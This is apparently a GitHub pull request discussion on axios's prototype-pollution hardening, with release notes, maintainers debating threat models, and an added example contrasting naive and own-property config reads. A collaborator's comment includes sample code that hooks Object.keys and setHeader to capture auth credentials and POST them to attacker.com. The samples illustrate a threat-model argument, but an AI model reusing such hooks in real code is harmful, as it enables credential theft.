<li><strong><a href="https://redirect.github.com/mnahkies">@mnahkies</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7414">#7414</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/tboyila">@tboyila</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10759">#10759</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/Kingo64">@Kingo64</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/6897">#6897</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/ramram1048">@ramram1048</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/6389">#6389</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/FLNacif">@FLNacif</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/6460">#6460</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/zozo123">@zozo123</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10806">#10806</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/pierluigilenoci">@pierluigilenoci</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10802">#10802</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/afurm">@afurm</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10708">#10708</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/karan-lrn">@karan-lrn</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/ebeigarts">@ebeigarts</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7149">#7149</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/Raymondo97">@Raymondo97</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10782">#10782</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/mixelburg">@mixelburg</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10821">#10821</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/ashishkr96">@ashishkr96</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/cyphercodes">@cyphercodes</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10819">#10819</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/Jye10032">@Jye10032</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7260">#7260</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/VeerShah41">@VeerShah41</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7276">#7276</a></strong>)</li>
</ul>
<p><a
href="https://redirect.github.com/axios/axios/compare/v1.15.2...v1.16.0">Full
Changelog</a></p>
      </li>
      <li>
<b>1.15.2</b> - <a
href="https://redirect.github.com/axios/axios/releases/tag/v1.15.2">2026-04-21</a><br><p>This
release delivers prototype-pollution hardening for the Node HTTP
adapter, adds an opt-in <code>allowedSocketPaths</code> allowlist to
mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory
leak, and ships supply-chain hardening across CI and security docs.</p>
<h2>🔒 Security Fixes</h2>
<ul>
<li><strong>Prototype Pollution Hardening (HTTP Adapter):</strong>
Hardened the Node HTTP adapter and
<code>resolveConfig</code>/<code>mergeConfig</code>/validator paths to
read only own properties and use null-prototype config objects,
preventing polluted <code>auth</code>, <code>baseURL</code>,
<code>socketPath</code>, <code>beforeRedirect</code>, and
<code>insecureHTTPParser</code> from influencing requests. (<strong><a href="https://redirect.github.com/axios/axios/pull/10779">#10779</a></strong>)</li>
<li><strong>SSRF via <code>socketPath</code>:</strong> Rejects
non-string <code>socketPath</code> values and adds an opt-in
<code>allowedSocketPaths</code> config option to restrict permitted Unix
domain socket paths, returning <code>AxiosError</code>
<code>ERR_BAD_OPTION_VALUE</code> on mismatch. (<strong><a href="https://redirect.github.com/axios/axios/pull/10777">#10777</a></strong>)</li>
<li><strong>Supply-chain Hardening:</strong> Added <code>.npmrc</code>
with <code>ignore-scripts=true</code>, lockfile lint CI, non-blocking
reproducible build diff, scoped CODEOWNERS, expanded
<code>SECURITY.md</code>/<code>THREATMODEL.md</code> with provenance
verification (<code>npm audit signatures</code>), 60-day resolution
policy, and maintainer incident-response runbook. (<strong><a href="https://redirect.github.com/axios/axios/pull/10776">#10776</a></strong>)</li>
</ul>
<h2>🚀 New Features</h2>
<ul>
<li><strong><code>allowedSocketPaths</code> Config Option:</strong> New
request config option (and TypeScript types) to allowlist Unix domain
socket paths used by the Node http adapter; backwards compatible when
unset. (<strong><a href="https://redirect.github.com/axios/axios/pull/10777">#10777</a></strong>)</li>
</ul>
<h2>🐛 Bug Fixes</h2>
<ul>
<li><strong>Keep-alive Socket Memory Leak:</strong> Installs a single
per-socket <code>error</code> listener tracking the active request via
<code>kAxiosSocketListener</code>/<code>kAxiosCurrentReq</code>,
eliminating per-request listener accumulation,
<code>MaxListenersExceededWarning</code>, and linear heap growth under
concurrent or long-running keep-alive workloads (fixes <a href="https://redirect.github.com/axios/axios/issues/10780">#10780</a>).
(<strong><a href="https://redirect.github.com/axios/axios/pull/10788">#10788</a></strong>)</li>
</ul>
<h2>🔧 Maintenance &amp; Chores</h2>
<ul>
<li><strong>Changelog:</strong> Updated <code>CHANGELOG.md</code> with
v1.15.1 release notes. (<strong><a href="https://redirect.github.com/axios/axios/pull/10781">#10781</a></strong>)</li>
</ul>
<p><a
href="https://redirect.github.com/axios/axios/compare/v1.15.1...v1.15.2">Full
Changelog</a></p>
      </li>
    </ul>
from <a href="https://redirect.github.com/axios/axios/releases">axios
GitHub release notes</a>
  </details>
</details>

---

> [!IMPORTANT]
>
> - Check the changes in this PR to ensure they won't cause issues with your project.
> - This PR was automatically created by Snyk using the credentials of a real user.

---

**Note:** _You are seeing this because you or someone else with access
to this repository has authorized Snyk to open upgrade PRs._

**For more information:**

> - 🧐 [View latest project report](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724?utm_source=github&utm_medium=referral&page=upgrade-pr)
> - 📜 [Customise PR templates](https://docs.snyk.io/scan-using-snyk/pull-requests/snyk-fix-pull-or-merge-requests/customize-pr-templates?utm_source=&utm_content=fix-pr-template)
> - 🛠 [Adjust upgrade PR settings](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724/settings/integration?utm_source=github&utm_medium=referral&page=upgrade-pr)
> - 🔕 [Ignore this dependency or unsubscribe from future upgrade PRs](https://app.snyk.io/org/rudder-qa/project/3ec84776-2902-4d8e-9cd9-a5d98be10724/settings/integration?pkg=axios&utm_source=github&utm_medium=referral&page=upgrade-pr#auto-dep-upgrades)


Co-authored-by: snyk-bot <[email protected]>
@DigitalBrainJS (Collaborator)

@jasonsaayman If we assume an attacker can run code on the server and inject methods into the prototype, rather than simply pollute it with primitive values, how does this help prevent attacks? IMHO, we're essentially just pretending the CVE is not a false positive and then pretending to fix it, since if an attacker has successfully executed code via a vulnerability in a third-party module, they can inject any methods at any level, including the Node.js built-in API.
But the problem is that we have to complicate the codebase and then follow this approach for future functionality, which in reality solves practically nothing, and I am concerned about this prospect.

import axios from 'axios';

// Evil code injected somehow outside of Axios that we're trying to fight with
const isObject = (obj) => obj && typeof obj === 'object';

(({keys}) => {
  Object.keys = function (obj) {
    if (isObject(obj) && obj.auth) {
      console.log('Authorization header captured', obj.auth);
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: JSON.stringify({ auth: obj.auth })
      });
      obj.url = 'https://jsonplaceholder.typicode.com/todos/1';
    }
    return keys(obj);
  }
})(Object);
//---------------------

const {data} = await axios.get('https://httpbin.org/get', {
    auth: {
      username: 'user',
      password: 'secret'
    },
    baseURL: 'https://evil.com/api'
});

Or

(async () => {
  const http = await import('http');

  const {ClientRequest} = http;

  const {setHeader} = ClientRequest.prototype;

  http.ClientRequest.prototype.setHeader = function (header, value) {
    if (header === 'Authorization') {
      console.log(`Captured auth header [${value}]`); // Captured auth header [Basic dXNlcjpzZWNyZXQ=]
    }
    return setHeader.call(this, header, value);
  }
})();

setTimeout( async () => {
  const {data} = await axios.get('https://httpbin.org/get', {
    auth: {
      username: 'user',
      password: 'secret'
    },
    baseURL: 'https://evil.com/api'
  });
}, 1000);

And there are infinitely many such attack vectors. If the server we're requesting is able to poison the Object.prototype, it would be a real CVE vulnerability, but not if the environment is already compromised outside of the Axios module, it's like fighting windmills.

@jasonsaayman (Member, Author)

jasonsaayman commented May 26, 2026

Firstly, @DigitalBrainJS, I do not understand what the "complication" here is. It is a minimal, simple code change to sanitise only the objects at risk.

What you are mentioning is a different threat model. If the attacker can modify and execute arbitrary code in the same Node.js process, there is nothing we can realistically do to defend against that.

The only meaningful issues we can easily guard against are data-driven object prototype pollution. Attacker-controlled input is what we are guarding against. We treat the inherited properties as trusted config, so we must do the bare minimum to protect these values.

I will adjust the threat model, but we already covered this in there. We do not guard against the class of attack you are mentioning; we also mention that we only guard against read-side prototype pollution.

I am adjusting the threat model to be clearer and more explicit around monkey-patched JS or Node.js runtime APIs.

@jasonsaayman (Member, Author)

I have updated the threatmodel as mentioned

@DigitalBrainJS (Collaborator)

Affected Properties
config.beforeRedirect (lib/adapters/http.js line 698) Executes attacker-supplied callback during HTTP redirects.

const configBeforeRedirect = own('beforeRedirect');

@jasonsaayman the CVE claims that the attacker is able to supply their own beforeRedirect function handle, not just a primitive value. Obviously, without new Function(), eval(), setTimeout() or browser-specific API like DOM event listeners, there is no way to convert an injected string with code to a function to replace the function handle. Otherwise, there is no point in this protection, because if the attacker managed to achieve this outside of Axios, then from this point, the attacker already has full access to the process, and he doesn't even need to manipulate the internal logic of Axios.
If the attacker can define a beforeRedirect function in the object prototype, he can replace hasOwnProperty, toString etc. If the attacker simply declared beforeRedirect with a primitive value, then all he will achieve is the error throwing TypeError: [primitive] is not a function.

If we assume we can't trust an object's prototype, and therefore its inherited properties, then the problem becomes much broader than just the Axios configuration. The attack surface for prototype pollution by primitives that affect code logic can likely be found even in built-in Node.js modules. Protecting options that allow redirecting a request or increasing the trust level for a remote node, which would allow secrets to leak, seems logical, but it is doubtful that setting options like adapter would help a hacker in any way. How this will impact the codebase over time if you constantly have to doubt the authenticity of an object's prototype is difficult to predict.

@jasonsaayman (Member, Author)

I agree with the distinction you’re making. Hence, I have updated the ThreatModel and will assess any new CVEs using this approach.

Once again, the patch is not intended to defend against arbitrary in-process code execution or monkey-patched JS/Node APIs. If attacker-controlled code can patch Object.keys, ClientRequest.prototype.setHeader, http.request, etc., axios cannot meaningfully protect the caller process.

The fix is still valid for data-driven prototype pollution from another dependency in the same process, where axios later reads inherited config properties as if they were trusted own config values, for primitive/object-valued properties like auth, baseURL, socketPath, and insecureHTTPParser.

I agree that the advisory overstates; we could adjust it, but I don't think it's worth doing retroactively now. I don't see any value in removing the guard because it is cheap and consistent.

The long-term rule should not be “distrust every prototype everywhere.” It should be narrower: axios-owned config/options reads that control request behaviour should use own-property checks or null-prototype config. This provides a bounded policy, not an attempt to harden Node itself.

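The bounded policy stated in the reply above (own-property reads and null-prototype config for the axios-owned options that steer a request), shown as an added example that is not axios's own code: it constructs a data-driven pollution through an unsafe JSON merge in a hypothetical other dependency, then builds request options first the naive way and then the hardened way. Every name in it (`unsafeMerge`, `own`, `mergeConfigOwn`, `naiveRequestOptions`, `hardenedRequestOptions`, `withPollution`, `demo`) and every payload value is an assumption of the example, and the pollution is removed again before `demo()` returns.

```javascript
// Added illustration, not axios code. All function names and sample values
// below are assumptions of this example.

// Constructed bug in a hypothetical third-party dependency: a recursive merge
// of untrusted JSON that follows a "__proto__" key straight into Object.prototype.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], val); // for key "__proto__" this target is Object.prototype
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Own-property read: inherited (possibly polluted) values are never observed.
const own = (obj, key) =>
  obj !== null && obj !== undefined && Object.prototype.hasOwnProperty.call(obj, key)
    ? obj[key]
    : undefined;

// Null-prototype merge of defaults and per-request config, copying own keys only,
// so the merged config has nothing to inherit from Object.prototype at all.
function mergeConfigOwn(defaults, config) {
  const merged = Object.create(null);
  for (const src of [defaults, config]) {
    for (const key of Object.keys(src)) merged[key] = src[key];
  }
  return merged;
}

// Naive option building: plain property reads on a plain object, so anything
// sitting on Object.prototype is picked up as if the caller had configured it.
function naiveRequestOptions(config) {
  const options = {};
  if (config.auth) options.auth = `${config.auth.username}:${config.auth.password}`;
  options.url = (config.baseURL || '') + config.url;
  options.insecureHTTPParser = config.insecureHTTPParser;
  return options;
}

// Hardened: own-property reads into a null-prototype options object, with the
// boolean coerced so an inherited truthy value can never switch on the lax parser.
function hardenedRequestOptions(config) {
  const options = Object.create(null);
  const auth = own(config, 'auth');
  if (auth) options.auth = `${own(auth, 'username')}:${own(auth, 'password')}`;
  options.url = (own(config, 'baseURL') || '') + own(config, 'url');
  options.insecureHTTPParser = Boolean(own(config, 'insecureHTTPParser'));
  return options;
}

// Apply the constructed pollution for the duration of fn(), then delete the
// injected keys again so the process is left clean.
function withPollution(payloadJson, fn) {
  const parsed = JSON.parse(payloadJson); // JSON.parse yields an own key "__proto__"
  const injected = Object.keys(parsed['__proto__']);
  try {
    unsafeMerge({}, parsed);
    return fn();
  } finally {
    for (const k of injected) delete Object.prototype[k];
  }
}

function demo() {
  const defaults = { timeout: 1000 };
  const request = { url: '/api/items' }; // constructed: the caller set no auth or baseURL
  // Constructed pollution payload; the host name is a placeholder (.invalid TLD).
  const payload =
    '{"__proto__":{"auth":{"username":"polluted","password":"x"},' +
    '"baseURL":"https://polluted.invalid","insecureHTTPParser":true}}';
  return withPollution(payload, () => ({
    naive: naiveRequestOptions({ ...defaults, ...request }),
    hardened: hardenedRequestOptions(mergeConfigOwn(defaults, request)),
  }));
}
```

With the pollution in place, `demo().naive` carries an `auth` of `polluted:x`, a `url` rebased onto the polluted `baseURL`, and `insecureHTTPParser: true`, none of which the caller configured; `demo().hardened` keeps `/api/items`, has no `auth` at all, and reports `insecureHTTPParser: false`. The two layers are deliberately redundant: the null-prototype merge alone would already hide the inherited values, and the `own()` reads protect the adapter even when it is handed a plain object built elsewhere.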
Labels

commit::fix The PR is related to a bugfix priority::medium A medium priority

3 participants